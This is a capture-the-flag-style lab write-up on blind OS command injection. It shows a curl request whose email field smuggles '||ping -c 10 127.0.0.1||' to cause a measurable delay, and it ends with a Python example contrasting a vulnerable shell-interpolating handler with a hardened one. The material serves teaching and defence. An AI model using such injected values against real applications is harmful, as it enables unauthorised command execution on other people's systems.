# LAB 2 - Blind OS command injection with time delays

## Initial instructions
This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response.

To solve the lab, exploit the blind OS command injection vulnerability to cause a 10 second delay.
To solve this lab, we first submit feedback and intercept the request with Burp Suite.

![Pasted image 20250405202245.png](../Lab2Images/Pasted%20image%2020250405202245.png)

Once intercepted, the request can be converted to a curl command. The `-w "%{time_total}"` option prints how long the whole request took, which is the only signal we get from a blind injection:
```bash
curl -X POST "https://0a7a00a104a549ec806e53c9008b0090.web-security-academy.net/feedback/submit" \
  -H "Cookie: session=uojIvMJ2UiCuasfhRpV11FwYH3ULKxJ6" \
  -d "csrf=Nlasn4hNV4qorY97qn6wXDqFavmrhOa3&name=Astroo18&email=Astroo18%40astroo18.com||ping+-c+10+127.0.0.1||&subject=test&message=test" \
  -o /dev/null -s -w "\nTotal Time: %{time_total}\n"
```
The injection point is the `email` parameter. The `||` separators make the shell run the injected `ping -c 10 127.0.0.1` after the original command, and because `ping` sends ten packets at one-second intervals, the response is held back by roughly 10 seconds.

As the `Total Time` value shows, the vulnerable site delays its response, confirming the injection even though no command output is returned.

![Pasted image 20250405202920.png](../Lab2Images/Pasted%20image%2020250405202920.png)
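To show the defensive side of what this lab demonstrates, here is an added Python example (not part of the lab or this writeup) contrasting a feedback handler that interpolates the `email` field into a shell string with one that validates the address against an allowlist pattern and passes each field as a separate argv entry, with a timeout so an injected delay cannot hang the worker. The `mail` invocation and the `support@example.invalid` recipient are assumptions made for the example.

```python
import re
import subprocess

# Constructed example: a feedback handler that hands the submitted fields to a
# command-line mail tool. The vulnerable variant builds one shell string, so
# separators such as "||" in any field are interpreted by the shell.

# Allowlist pattern for the e-mail field (assumption: this is strict enough
# for the application's needs). Shell metacharacters are simply not admitted.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
RECIPIENT = "support@example.invalid"  # assumed recipient address


def vulnerable_command(name, email, subject, message):
    """Vulnerable pattern: string interpolation into a shell command line.

    Returned rather than executed so the example is safe to run; with
    shell=True this string would let "||ping -c 10 127.0.0.1||" run.
    """
    return f'mail -s "{subject}" -r {email} {RECIPIENT} <<< "{name}: {message}"'


def validate_email(email):
    """True only if the whole field matches the allowlist pattern."""
    return EMAIL_RE.fullmatch(email) is not None


def hardened_argv(name, email, subject, message):
    """Hardened pattern: reject bad input, then build an argv list.

    Each field becomes exactly one argument; no shell ever parses it.
    """
    if not validate_email(email):
        raise ValueError("rejected e-mail address")
    return ["mail", "-s", subject, "-r", email, RECIPIENT]


def send_hardened(name, email, subject, message, timeout=5):
    """Run the mail tool without a shell and with a hard timeout.

    The timeout bounds the damage of any slow or hanging command, which is
    the very signal a time-based probe relies on.
    """
    argv = hardened_argv(name, email, subject, message)
    body = f"{name}: {message}\n".encode()
    return subprocess.run(argv, input=body, check=True, timeout=timeout)
```

`hardened_argv` rejects the lab's payload before anything is executed, while a plain address passes through as a single argv entry.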